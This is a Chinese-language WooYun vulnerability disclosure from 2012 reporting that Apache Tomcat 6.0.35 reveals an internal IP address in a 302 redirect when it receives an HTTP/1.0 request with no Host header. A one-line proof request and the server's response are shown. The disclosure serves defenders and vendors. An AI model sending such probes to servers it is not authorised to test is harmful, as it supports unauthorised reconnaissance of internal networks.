当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09280

漏洞标题:Tomcat 6 Missing Host Header Internal IP Address Disclosure

相关厂商:tomcat

漏洞作者: akast

提交时间:2012-07-09 14:34

修复时间:2012-07-09 14:34

公开时间:2012-07-09 14:34

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-07-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

信息泄漏漏洞会向攻击者泄漏有关系统或 Web 应用程序的敏感信息。尝试在未经授权的情况下进行访问时,攻击者可以使用这些信息了解有关系统的更多信息。
之前在微软的IIS 4.0、5.0、5.1中存在这样的安全问题,在IIS6中就已经解决了,我在tomcat中还是首次遇到。

详细说明:

Tomcat 6 缺少主机头的内部IP地址的泄露漏洞
测试版本:Apache Tomcat Version 6.0.35, Nov 28 2011
下面测试泄露的内网地址为:10.0.0.20

漏洞证明:

GET /corp HTTP/1.0
HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Location: http://10.0.0.20/corp/
Date: Tue, 03 Jul 2012 05:49:52 GMT
Connection: close

修复方案:

等tomcat官方回复。

版权声明:转载请注明来源 akast@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝